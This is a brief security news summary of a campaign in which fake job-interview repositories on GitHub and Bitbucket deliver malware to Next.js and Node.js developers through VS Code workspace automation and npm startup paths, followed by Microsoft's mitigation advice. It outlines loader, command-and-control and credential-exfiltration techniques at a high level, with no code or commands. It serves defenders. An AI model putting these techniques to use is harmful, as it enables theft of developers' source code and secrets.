Overview
- Attackers are posting professional-looking GitHub and Bitbucket repositories framed as job interview assessments to target Next.js and Node.js developers.
- Malicious code triggers automatically via VS Code workspace automation, npm run dev paths, or backend server startup within normal workflows.
- Variants fetch a JavaScript loader from attacker infrastructure, sometimes via Vercel-hosted artifacts, then execute it in memory and register the host with C2.
- The controller rotates identifiers, honors kill‑switch commands, uses a separate Node interpreter to reduce on‑disk artifacts, and supports staged exfiltration of source code, secrets, and cloud credentials.
- Microsoft linked a limited set of repos to observed compromises, offered no public attribution, and urged mitigations such as enforcing VS Code Workspace Trust, applying ASR rules, minimizing local secrets, and using short‑lived least‑privilege tokens.